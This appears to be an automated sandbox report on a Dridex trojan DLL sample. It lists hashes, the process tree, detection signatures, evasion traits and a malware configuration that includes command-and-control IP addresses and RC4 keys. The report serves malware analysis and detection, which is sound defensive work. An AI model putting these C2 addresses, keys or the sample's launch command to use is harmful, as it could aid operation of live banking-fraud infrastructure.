Play interactive tour

Edit tour

Windows Analysis Report SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.21147.31369

Overview

General Information

Sample Name:	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.21147.31369 (renamed file extension from 31369 to dll)
Analysis ID:	544206
MD5:	9e01fd2137e4b2b6e5bec3c7e3e40a77
SHA1:	da6ef7a2e64e977b43801e75c2f063ca7094dc3f
SHA256:	07c08b4a043b8bc8bea97f36414ae42ade74a37c4d5542727fe6fb0644a48a71
Tags:	dllDridex
Infos:
Most interesting Screenshot:

Detection

Dridex

Score:	76
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Yara detected Dridex unpacked file

Multi AV Scanner detection for submitted file

Sigma detected: Suspicious Call by Ordinal

Tries to delay execution (extensive OutputDebugStringW loop)

C2 URLs / IPs found in malware configuration

Creates a DirectInput object (often for capturing keystrokes)

Uses 32bit PE files

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

AV process strings found (often used to terminate AV products)

Sample file is different than original file name gathered from version info

One or more processes crash

Contains functionality to query locales information (e.g. system language)

Uses code obfuscation techniques (call, push, ret)

Checks if the current process is being debugged

Internet Provider seen in connection with other malware

Detected potential crypto function

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to call native functions

Creates a process in suspended mode (likely to inject code)

IP address seen in connection with other malware

Entry point lies outside standard sections

Abnormal high CPU Usage

Classification

Process Tree

System is w10x64

loaddll32.exe (PID: 6564 cmdline: loaddll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.21147.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)

cmd.exe (PID: 6560 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.21147.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)

rundll32.exe (PID: 576 cmdline: rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.21147.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

WerFault.exe (PID: 6292 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 576 -s 684 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

cleanup

Malware Configuration

Threatname: Dridex

{"Version": 22201, "C2 list": ["144.91.122.102:443", "85.10.248.28:593", "185.4.135.27:5228", "80.211.3.13:8116"], "RC4 keys": ["3IC8sFlUX9XZuoBQY9u5LhcZnHsV7E5r", "hnk63OiMfIbUqQnY7gkPwplwC0Ue5ZkZBYMCTYTjntqX7zsy9OvtNUlthJZXRtFF6P52Zbz6R5"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000002.00000000.358625474.000000006F321000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
00000000.00000002.874060553.000000006F321000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
00000002.00000000.360380843.000000006F321000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
00000002.00000002.393412390.000000006F321000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security

Unpacked PEs

Source	Rule	Description	Author
0.2.loaddll32.exe.6f320000.2.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
2.0.rundll32.exe.6f320000.2.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
2.0.rundll32.exe.6f320000.5.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
2.2.rundll32.exe.6f320000.2.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security

Sigma Overview

System Summary:

Sigma detected: Suspicious Call by Ordinal

Show sources

Source: Process started

Author: Florian Roth: Data: Command: rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.21147.dll",#1, CommandLine: rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.21147.dll",#1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.21147.dll",#1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6560, ProcessCommandLine: rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.21147.dll",#1, ProcessId: 576

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 2.0.rundll32.exe.6f320000.5.unpack

Malware Configuration Extractor: Dridex {"Version": 22201, "C2 list": ["144.91.122.102:443", "85.10.248.28:593", "185.4.135.27:5228", "80.211.3.13:8116"], "RC4 keys": ["3IC8sFlUX9XZuoBQY9u5LhcZnHsV7E5r", "hnk63OiMfIbUqQnY7gkPwplwC0Ue5ZkZBYMCTYTjntqX7zsy9OvtNUlthJZXRtFF6P52Zbz6R5"]}

Multi AV Scanner detection for submitted file

Show sources

Source: SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.21147.dll	Virustotal: Detection: 19%			Perma Link
Source: SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.21147.dll	ReversingLabs: Detection: 30%

Source: SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.21147.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.21147.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: wkernel32.pdb source: WerFault.exe, 00000005.00000003.370706738.0000000004891000.00000004.00000001.sdmp, WerFault.exe, 00000005.00000003.364379122.00000000045CE000.00000004.00000001.sdmp
Source:	Binary string: powrprof.pdbH source: WerFault.exe, 00000005.00000003.370718956.00000000049B6000.00000004.00000040.sdmp
Source:	Binary string: sfc_os.pdb source: WerFault.exe, 00000005.00000003.370718956.00000000049B6000.00000004.00000040.sdmp
Source:	Binary string: bcrypt.pdb source: WerFault.exe, 00000005.00000003.370718956.00000000049B6000.00000004.00000040.sdmp
Source:	Binary string: ucrtbase.pdb source: WerFault.exe, 00000005.00000003.370712136.00000000049B0000.00000004.00000040.sdmp
Source:	Binary string: msvcrt.pdb source: WerFault.exe, 00000005.00000003.370706738.0000000004891000.00000004.00000001.sdmp
Source:	Binary string: winspool.pdbN source: WerFault.exe, 00000005.00000003.370718956.00000000049B6000.00000004.00000040.sdmp
Source:	Binary string: wrpcrt4.pdb source: WerFault.exe, 00000005.00000003.370712136.00000000049B0000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdb source: loaddll32.exe, 00000000.00000003.362384342.000000004B280000.00000004.00000001.sdmp, WerFault.exe, 00000005.00000003.370706738.0000000004891000.00000004.00000001.sdmp
Source:	Binary string: shcore.pdb source: WerFault.exe, 00000005.00000003.370712136.00000000049B0000.00000004.00000040.sdmp
Source:	Binary string: wgdi32.pdb source: WerFault.exe, 00000005.00000003.370706738.0000000004891000.00000004.00000001.sdmp
Source:	Binary string: fltLib.pdb source: WerFault.exe, 00000005.00000003.370718956.00000000049B6000.00000004.00000040.sdmp
Source:	Binary string: advapi32.pdb source: WerFault.exe, 00000005.00000003.370718956.00000000049B6000.00000004.00000040.sdmp
Source:	Binary string: wsspicli.pdb source: WerFault.exe, 00000005.00000003.370718956.00000000049B6000.00000004.00000040.sdmp
Source:	Binary string: shell32.pdb source: WerFault.exe, 00000005.00000003.370712136.00000000049B0000.00000004.00000040.sdmp
Source:	Binary string: iphlpapi.pdbV source: WerFault.exe, 00000005.00000003.370718956.00000000049B6000.00000004.00000040.sdmp
Source:	Binary string: msvcp_win.pdb source: WerFault.exe, 00000005.00000003.370706738.0000000004891000.00000004.00000001.sdmp
Source:	Binary string: oleaut32.pdbC source: WerFault.exe, 00000005.00000003.370718956.00000000049B6000.00000004.00000040.sdmp
Source:	Binary string: wkernelbase.pdb source: WerFault.exe, 00000005.00000003.370706738.0000000004891000.00000004.00000001.sdmp
Source:	Binary string: wimm32.pdb source: WerFault.exe, 00000005.00000003.370718956.00000000049B6000.00000004.00000040.sdmp
Source:	Binary string: shlwapi.pdb source: WerFault.exe, 00000005.00000003.370718956.00000000049B6000.00000004.00000040.sdmp
Source:	Binary string: mpr.pdb source: WerFault.exe, 00000005.00000003.370712136.00000000049B0000.00000004.00000040.sdmp
Source:	Binary string: wwin32u.pdb source: WerFault.exe, 00000005.00000003.370706738.0000000004891000.00000004.00000001.sdmp
Source:	Binary string: setupapi.pdb source: WerFault.exe, 00000005.00000003.370718956.00000000049B6000.00000004.00000040.sdmp
Source:	Binary string: imagehlp.pdb source: WerFault.exe, 00000005.00000003.370718956.00000000049B6000.00000004.00000040.sdmp
Source:	Binary string: wUxTheme.pdb source: WerFault.exe, 00000005.00000003.370718956.00000000049B6000.00000004.00000040.sdmp
Source:	Binary string: dwmapi.pdb source: WerFault.exe, 00000005.00000003.370718956.00000000049B6000.00000004.00000040.sdmp
Source:	Binary string: RFFGTEQ.pdb source: SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.21147.dll
Source:	Binary string: shcore.pdbk source: WerFault.exe, 00000005.00000003.370712136.00000000049B0000.00000004.00000040.sdmp
Source:	Binary string: profapi.pdb source: WerFault.exe, 00000005.00000003.370718956.00000000049B6000.00000004.00000040.sdmp
Source:	Binary string: ws2_32.pdb source: WerFault.exe, 00000005.00000003.370718956.00000000049B6000.00000004.00000040.sdmp
Source:	Binary string: wsspicli.pdbP source: WerFault.exe, 00000005.00000003.370718956.00000000049B6000.00000004.00000040.sdmp
Source:	Binary string: winspool.pdb source: WerFault.exe, 00000005.00000003.370718956.00000000049B6000.00000004.00000040.sdmp
Source:	Binary string: wgdi32full.pdb source: WerFault.exe, 00000005.00000003.370706738.0000000004891000.00000004.00000001.sdmp
Source:	Binary string: shell32.pdbk source: WerFault.exe, 00000005.00000003.370712136.00000000049B0000.00000004.00000040.sdmp
Source:	Binary string: sechost.pdb source: WerFault.exe, 00000005.00000003.370718956.00000000049B6000.00000004.00000040.sdmp
Source:	Binary string: iphlpapi.pdb source: WerFault.exe, 00000005.00000003.370718956.00000000049B6000.00000004.00000040.sdmp
Source:	Binary string: propsys.pdb source: WerFault.exe, 00000005.00000003.370718956.00000000049B6000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.362384342.000000004B280000.00000004.00000001.sdmp
Source:	Binary string: cfgmgr32.pdbk source: WerFault.exe, 00000005.00000003.370712136.00000000049B0000.00000004.00000040.sdmp
Source:	Binary string: ucrtbase.pdbk source: WerFault.exe, 00000005.00000003.370712136.00000000049B0000.00000004.00000040.sdmp
Source:	Binary string: powrprof.pdb source: WerFault.exe, 00000005.00000003.370718956.00000000049B6000.00000004.00000040.sdmp
Source:	Binary string: msctf.pdb source: WerFault.exe, 00000005.00000003.370718956.00000000049B6000.00000004.00000040.sdmp
Source:	Binary string: fltLib.pdb\ source: WerFault.exe, 00000005.00000003.370718956.00000000049B6000.00000004.00000040.sdmp
Source:	Binary string: AcLayers.pdb source: WerFault.exe, 00000005.00000003.370706738.0000000004891000.00000004.00000001.sdmp
Source:	Binary string: dwmapi.pdbi source: WerFault.exe, 00000005.00000003.370718956.00000000049B6000.00000004.00000040.sdmp
Source:	Binary string: bcrypt.pdbj source: WerFault.exe, 00000005.00000003.370718956.00000000049B6000.00000004.00000040.sdmp
Source:	Binary string: profapi.pdbB source: WerFault.exe, 00000005.00000003.370718956.00000000049B6000.00000004.00000040.sdmp
Source:	Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000005.00000003.370712136.00000000049B0000.00000004.00000040.sdmp
Source:	Binary string: cryptbase.pdb source: WerFault.exe, 00000005.00000003.370718956.00000000049B6000.00000004.00000040.sdmp
Source:	Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000005.00000003.370712136.00000000049B0000.00000004.00000040.sdmp
Source:	Binary string: cfgmgr32.pdb source: WerFault.exe, 00000005.00000003.370712136.00000000049B0000.00000004.00000040.sdmp
Source:	Binary string: combase.pdb source: WerFault.exe, 00000005.00000003.370718956.00000000049B6000.00000004.00000040.sdmp
Source:	Binary string: Windows.Storage.pdb source: WerFault.exe, 00000005.00000003.370712136.00000000049B0000.00000004.00000040.sdmp
Source:	Binary string: rundll32.pdb source: WerFault.exe, 00000005.00000003.370706738.0000000004891000.00000004.00000001.sdmp
Source:	Binary string: oleaut32.pdb source: WerFault.exe, 00000005.00000003.370718956.00000000049B6000.00000004.00000040.sdmp
Source:	Binary string: sfc.pdb source: WerFault.exe, 00000005.00000003.370718956.00000000049B6000.00000004.00000040.sdmp
Source:	Binary string: apphelp.pdb source: WerFault.exe, 00000005.00000003.370706738.0000000004891000.00000004.00000001.sdmp
Source:	Binary string: wuser32.pdb source: WerFault.exe, 00000005.00000003.370706738.0000000004891000.00000004.00000001.sdmp

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor	IPs: 144.91.122.102:443
Source: Malware configuration extractor	IPs: 85.10.248.28:593
Source: Malware configuration extractor	IPs: 185.4.135.27:5228
Source: Malware configuration extractor	IPs: 80.211.3.13:8116

Source: Joe Sandbox View	ASN Name: TOPHOSTGR TOPHOSTGR
Source: Joe Sandbox View	ASN Name: HETZNER-ASDE HETZNER-ASDE
Source: Joe Sandbox View	ASN Name: ARUBA-ASNIT ARUBA-ASNIT

Source: Joe Sandbox View	IP Address: 185.4.135.27 185.4.135.27
Source: Joe Sandbox View	IP Address: 85.10.248.28 85.10.248.28
Source: Joe Sandbox View	IP Address: 80.211.3.13 80.211.3.13

Source: WerFault.exe, 00000005.00000002.392270326.0000000004524000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: Amcache.hve.5.dr	String found in binary or memory: http://upx.sf.net
Source: loaddll32.exe, 00000000.00000002.874127686.000000006F33F000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.360458049.000000006F33F000.00000002.00020000.sdmp	String found in binary or memory: http://www.n4pkg6fy8o.gaDVarFileInfo$

Source: loaddll32.exe, 00000000.00000002.873659741.0000000000E6B000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected Dridex unpacked file

Show sources

Source: Yara match	File source: 0.2.loaddll32.exe.6f320000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.rundll32.exe.6f320000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.rundll32.exe.6f320000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.6f320000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000000.358625474.000000006F321000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.874060553.000000006F321000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.360380843.000000006F321000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.393412390.000000006F321000.00000020.00020000.sdmp, type: MEMORY

System Summary:

Source: SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.21147.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.21147.dll

Binary or memory string: OriginalFilenameIha.dllD vs SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.21147.dll

Source: C:\Windows\SysWOW64\rundll32.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 576 -s 684

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6F330730	0_2_6F330730
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6F339370	0_2_6F339370
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6F33143C	0_2_6F33143C
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6F328428	0_2_6F328428
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6F321494	0_2_6F321494
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6F32A4E8	0_2_6F32A4E8

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6F332234 NtDelayExecution,		0_2_6F332234
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6F332820 NtAllocateVirtualMemory,		0_2_6F332820

Source: C:\Windows\System32\loaddll32.exe

Process Stats: CPU usage > 98%

Source: SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.21147.dll	Virustotal: Detection: 19%
Source: SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.21147.dll	ReversingLabs: Detection: 30%

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.21147.dll",#1

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.21147.dll"
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.21147.dll",#1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.21147.dll",#1
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 576 -s 684
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.21147.dll",#1	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.21147.dll",#1	Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess576

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WERDCC7.tmp

Jump to behavior

Source: classification engine

Classification label: mal76.troj.evad.winDLL@6/6@0/4

Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.21147.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.21147.dll

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: wkernel32.pdb source: WerFault.exe, 00000005.00000003.370706738.0000000004891000.00000004.00000001.sdmp, WerFault.exe, 00000005.00000003.364379122.00000000045CE000.00000004.00000001.sdmp
Source:	Binary string: powrprof.pdbH source: WerFault.exe, 00000005.00000003.370718956.00000000049B6000.00000004.00000040.sdmp
Source:	Binary string: sfc_os.pdb source: WerFault.exe, 00000005.00000003.370718956.00000000049B6000.00000004.00000040.sdmp
Source:	Binary string: bcrypt.pdb source: WerFault.exe, 00000005.00000003.370718956.00000000049B6000.00000004.00000040.sdmp
Source:	Binary string: ucrtbase.pdb source: WerFault.exe, 00000005.00000003.370712136.00000000049B0000.00000004.00000040.sdmp
Source:	Binary string: msvcrt.pdb source: WerFault.exe, 00000005.00000003.370706738.0000000004891000.00000004.00000001.sdmp
Source:	Binary string: winspool.pdbN source: WerFault.exe, 00000005.00000003.370718956.00000000049B6000.00000004.00000040.sdmp
Source:	Binary string: wrpcrt4.pdb source: WerFault.exe, 00000005.00000003.370712136.00000000049B0000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdb source: loaddll32.exe, 00000000.00000003.362384342.000000004B280000.00000004.00000001.sdmp, WerFault.exe, 00000005.00000003.370706738.0000000004891000.00000004.00000001.sdmp
Source:	Binary string: shcore.pdb source: WerFault.exe, 00000005.00000003.370712136.00000000049B0000.00000004.00000040.sdmp
Source:	Binary string: wgdi32.pdb source: WerFault.exe, 00000005.00000003.370706738.0000000004891000.00000004.00000001.sdmp
Source:	Binary string: fltLib.pdb source: WerFault.exe, 00000005.00000003.370718956.00000000049B6000.00000004.00000040.sdmp
Source:	Binary string: advapi32.pdb source: WerFault.exe, 00000005.00000003.370718956.00000000049B6000.00000004.00000040.sdmp
Source:	Binary string: wsspicli.pdb source: WerFault.exe, 00000005.00000003.370718956.00000000049B6000.00000004.00000040.sdmp
Source:	Binary string: shell32.pdb source: WerFault.exe, 00000005.00000003.370712136.00000000049B0000.00000004.00000040.sdmp
Source:	Binary string: iphlpapi.pdbV source: WerFault.exe, 00000005.00000003.370718956.00000000049B6000.00000004.00000040.sdmp
Source:	Binary string: msvcp_win.pdb source: WerFault.exe, 00000005.00000003.370706738.0000000004891000.00000004.00000001.sdmp
Source:	Binary string: oleaut32.pdbC source: WerFault.exe, 00000005.00000003.370718956.00000000049B6000.00000004.00000040.sdmp
Source:	Binary string: wkernelbase.pdb source: WerFault.exe, 00000005.00000003.370706738.0000000004891000.00000004.00000001.sdmp
Source:	Binary string: wimm32.pdb source: WerFault.exe, 00000005.00000003.370718956.00000000049B6000.00000004.00000040.sdmp
Source:	Binary string: shlwapi.pdb source: WerFault.exe, 00000005.00000003.370718956.00000000049B6000.00000004.00000040.sdmp
Source:	Binary string: mpr.pdb source: WerFault.exe, 00000005.00000003.370712136.00000000049B0000.00000004.00000040.sdmp
Source:	Binary string: wwin32u.pdb source: WerFault.exe, 00000005.00000003.370706738.0000000004891000.00000004.00000001.sdmp
Source:	Binary string: setupapi.pdb source: WerFault.exe, 00000005.00000003.370718956.00000000049B6000.00000004.00000040.sdmp
Source:	Binary string: imagehlp.pdb source: WerFault.exe, 00000005.00000003.370718956.00000000049B6000.00000004.00000040.sdmp
Source:	Binary string: wUxTheme.pdb source: WerFault.exe, 00000005.00000003.370718956.00000000049B6000.00000004.00000040.sdmp
Source:	Binary string: dwmapi.pdb source: WerFault.exe, 00000005.00000003.370718956.00000000049B6000.00000004.00000040.sdmp
Source:	Binary string: RFFGTEQ.pdb source: SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.21147.dll
Source:	Binary string: shcore.pdbk source: WerFault.exe, 00000005.00000003.370712136.00000000049B0000.00000004.00000040.sdmp
Source:	Binary string: profapi.pdb source: WerFault.exe, 00000005.00000003.370718956.00000000049B6000.00000004.00000040.sdmp
Source:	Binary string: ws2_32.pdb source: WerFault.exe, 00000005.00000003.370718956.00000000049B6000.00000004.00000040.sdmp
Source:	Binary string: wsspicli.pdbP source: WerFault.exe, 00000005.00000003.370718956.00000000049B6000.00000004.00000040.sdmp
Source:	Binary string: winspool.pdb source: WerFault.exe, 00000005.00000003.370718956.00000000049B6000.00000004.00000040.sdmp
Source:	Binary string: wgdi32full.pdb source: WerFault.exe, 00000005.00000003.370706738.0000000004891000.00000004.00000001.sdmp
Source:	Binary string: shell32.pdbk source: WerFault.exe, 00000005.00000003.370712136.00000000049B0000.00000004.00000040.sdmp
Source:	Binary string: sechost.pdb source: WerFault.exe, 00000005.00000003.370718956.00000000049B6000.00000004.00000040.sdmp
Source:	Binary string: iphlpapi.pdb source: WerFault.exe, 00000005.00000003.370718956.00000000049B6000.00000004.00000040.sdmp
Source:	Binary string: propsys.pdb source: WerFault.exe, 00000005.00000003.370718956.00000000049B6000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.362384342.000000004B280000.00000004.00000001.sdmp
Source:	Binary string: cfgmgr32.pdbk source: WerFault.exe, 00000005.00000003.370712136.00000000049B0000.00000004.00000040.sdmp
Source:	Binary string: ucrtbase.pdbk source: WerFault.exe, 00000005.00000003.370712136.00000000049B0000.00000004.00000040.sdmp
Source:	Binary string: powrprof.pdb source: WerFault.exe, 00000005.00000003.370718956.00000000049B6000.00000004.00000040.sdmp
Source:	Binary string: msctf.pdb source: WerFault.exe, 00000005.00000003.370718956.00000000049B6000.00000004.00000040.sdmp
Source:	Binary string: fltLib.pdb\ source: WerFault.exe, 00000005.00000003.370718956.00000000049B6000.00000004.00000040.sdmp
Source:	Binary string: AcLayers.pdb source: WerFault.exe, 00000005.00000003.370706738.0000000004891000.00000004.00000001.sdmp
Source:	Binary string: dwmapi.pdbi source: WerFault.exe, 00000005.00000003.370718956.00000000049B6000.00000004.00000040.sdmp
Source:	Binary string: bcrypt.pdbj source: WerFault.exe, 00000005.00000003.370718956.00000000049B6000.00000004.00000040.sdmp
Source:	Binary string: profapi.pdbB source: WerFault.exe, 00000005.00000003.370718956.00000000049B6000.00000004.00000040.sdmp
Source:	Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000005.00000003.370712136.00000000049B0000.00000004.00000040.sdmp
Source:	Binary string: cryptbase.pdb source: WerFault.exe, 00000005.00000003.370718956.00000000049B6000.00000004.00000040.sdmp
Source:	Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000005.00000003.370712136.00000000049B0000.00000004.00000040.sdmp
Source:	Binary string: cfgmgr32.pdb source: WerFault.exe, 00000005.00000003.370712136.00000000049B0000.00000004.00000040.sdmp
Source:	Binary string: combase.pdb source: WerFault.exe, 00000005.00000003.370718956.00000000049B6000.00000004.00000040.sdmp
Source:	Binary string: Windows.Storage.pdb source: WerFault.exe, 00000005.00000003.370712136.00000000049B0000.00000004.00000040.sdmp
Source:	Binary string: rundll32.pdb source: WerFault.exe, 00000005.00000003.370706738.0000000004891000.00000004.00000001.sdmp
Source:	Binary string: oleaut32.pdb source: WerFault.exe, 00000005.00000003.370718956.00000000049B6000.00000004.00000040.sdmp
Source:	Binary string: sfc.pdb source: WerFault.exe, 00000005.00000003.370718956.00000000049B6000.00000004.00000040.sdmp
Source:	Binary string: apphelp.pdb source: WerFault.exe, 00000005.00000003.370706738.0000000004891000.00000004.00000001.sdmp
Source:	Binary string: wuser32.pdb source: WerFault.exe, 00000005.00000003.370706738.0000000004891000.00000004.00000001.sdmp

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6F32F6A8 push esi; mov dword ptr [esp], 00000000h

0_2_6F32F6A9

Source: initial sample

Static PE information: section where entry point is pointing to: .rdata

Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Tries to delay execution (extensive OutputDebugStringW loop)

Show sources

Source: C:\Windows\System32\loaddll32.exe

